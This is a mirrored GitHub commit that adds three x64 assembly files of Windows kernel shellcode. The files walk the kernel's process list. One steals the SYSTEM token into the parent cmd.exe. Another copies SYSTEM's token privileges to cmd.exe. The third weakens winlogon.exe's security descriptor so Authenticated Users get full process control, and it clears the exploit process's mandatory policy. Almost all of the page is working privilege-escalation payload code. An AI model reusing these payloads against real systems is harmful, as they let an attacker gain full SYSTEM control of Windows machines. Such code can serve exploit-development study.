mirror of
https://github.com/r0keb/Windows-Kernel-Shellcode
synced 2026-08-09 13:06:13 +00:00
Add files via upload
This commit is contained in:
@@ -0,0 +1,28 @@
|
||||
BITS 64
|
||||
|
||||
section .text
|
||||
|
||||
nop
|
||||
|
||||
mov r8, qword [gs:0x188] ; Get _KTHREAD Address into r8
|
||||
mov r8, qword [r8 + 0x220] ; Get _EPROCESS Address
|
||||
mov rcx, r8 ; save Exploit process' _EPROCESS structure on rcx
|
||||
|
||||
loop1:
|
||||
mov r8, qword [r8 + 0x448] ; move the flink into r8
|
||||
sub r8, 0x448 ; go back to the start of the struct
|
||||
cmp dword [r8+0x5a8], 0x6C6E6977 ; compare if it is equal to the first 4 characters "winl" (little endiand so "lniw")
|
||||
jnz loop1
|
||||
|
||||
sub r8, 0x30 ; get the _OBJECT_HEADER of winlogon.exe
|
||||
mov r8, [r8 + 0x28] ; move to the SecurityDescriptor parameter
|
||||
and r8, 0xfffffffffffffff0 ; get the pointer to the object instead the fast reference pointer
|
||||
mov byte [r8+0x20+0x28], 0x0b ; _SECURITY_DESCRIPTOR + 0x20 (DACL start) + 0x28 (byte we want to change); 0x12 (SYSTEM) -> 0x0b (Authenticated Users; sid S-1-5-18 (SYSTEM) Full Process Control -> S-1-5-11 Full Process Control (Authenticated Users)
|
||||
mov rcx, [rcx+0x4b8] ; get the exploit process' _TOKEN structure
|
||||
and rcx, 0xfffffffffffffff0 ; get the pointer to the object and not the fast reference
|
||||
mov byte [rcx + 0x0d4], 0x0 ; set MandatoryPolicy to 0 (open handle to any process besides the privilege)
|
||||
|
||||
nop
|
||||
ret
|
||||
|
||||
end
|
||||
@@ -0,0 +1,38 @@
|
||||
BITS 64
|
||||
section .text
|
||||
|
||||
nop
|
||||
|
||||
mov r8, qword [gs:0x188]
|
||||
mov r8, qword [r8 + 0x220]
|
||||
mov r10, r8 ; get two _EPROCESS' start addresses (one for cmd and the other for system)
|
||||
mov r9, qword [r8 + 0x540] ; get the cmd.exe PID (InheritedFromUniqueProcessId)
|
||||
|
||||
GetSystemLoop:
|
||||
mov r10, qword [r10 + 0x448] ; go to the flink
|
||||
sub r10, 0x448 ; go to the _EPROCESS' startpoint
|
||||
cmp qword [r10 + 0x440], 0x04 ; compare the UniqueProcessId with 4 (system PID)
|
||||
jne GetSystemLoop
|
||||
|
||||
mov r10, [r10 + 0x4b8] ; get the system process _TOKEN structure
|
||||
and r10, 0xfffffffffffffff0 ; get the pointer to the object and not to the fast reference pointer
|
||||
|
||||
GetCmdLoop:
|
||||
mov r8, qword [r8+0x448] ; go to the flink
|
||||
sub r8, 0x448 ; go to the _EPROCESS' startpoint
|
||||
cmp qword [r8 + 0x440], r9 ; compare the UniqueProcessId cmd.exe's PID
|
||||
jne GetCmdLoop
|
||||
|
||||
mov r8, [r8 + 0x4b8] ; get the system process _TOKEN structure
|
||||
and r8, 0xfffffffffffffff0 ; get the pointer to the object and not to the fast reference pointer
|
||||
|
||||
mov r9, qword [r10 + 0x40] ; move the Present parameter from _SEP_TOKEN_PRIVILEGES system process substructure to the same at cmd.exe
|
||||
mov qword [r8 + 0x40], r9
|
||||
mov r9, qword [r10 + 0x48] ; move the Enabled parameter from _SEP_TOKEN_PRIVILEGES system process substructure to the same at cmd.exe
|
||||
mov qword [r8 + 0x48], r9
|
||||
mov r9, qword [r10 + 0x50] ; move the EnabledByDefault parameter from _SEP_TOKEN_PRIVILEGES system process substructure to the same at cmd.exe
|
||||
mov qword [r8 + 0x50], r9
|
||||
|
||||
ret
|
||||
|
||||
end
|
||||
@@ -0,0 +1,32 @@
|
||||
section .text
|
||||
BITS 64
|
||||
|
||||
nop
|
||||
|
||||
mov r9, qword [gs:0x188] ; get _KTHREAD
|
||||
mov r9, qword [r9 + 0x220] ; get _EPROCESS/_KPROCESS
|
||||
mov r8, qword [r9 + 0x540] ; get the InheritedFromUniqueProcessId (cmd.exe PID)
|
||||
|
||||
loop1:
|
||||
mov r9, qword [r9+0x448] ; go to the flink
|
||||
sub r9, 0x448 ; back to the start of _EPROCESS
|
||||
mov r10, qword [r9+0x440] ; get the UniqueProcessId
|
||||
cmp r10, r8 ; compare both PIDs
|
||||
jne loop1
|
||||
|
||||
mov rax, r9 ; get the cmd.exe's token
|
||||
add rax, 0x4b8 ; get the address of _EPROCESS on Token position
|
||||
|
||||
loop2:
|
||||
mov r9, qword [r9+0x448] ; go to the flink
|
||||
sub r9, 0x448 ; go to the _EPROCESS' structure start
|
||||
mov r10, qword [r9+0x440] ; Get the UniqueProcesId
|
||||
cmp r10, 4 ; compare the process ID with 4
|
||||
jne loop2
|
||||
|
||||
mov r9, qword [r9+0x4b8]
|
||||
mov [rax], r9
|
||||
|
||||
ret
|
||||
|
||||
end
|
||||
Reference in New Issue
Block a user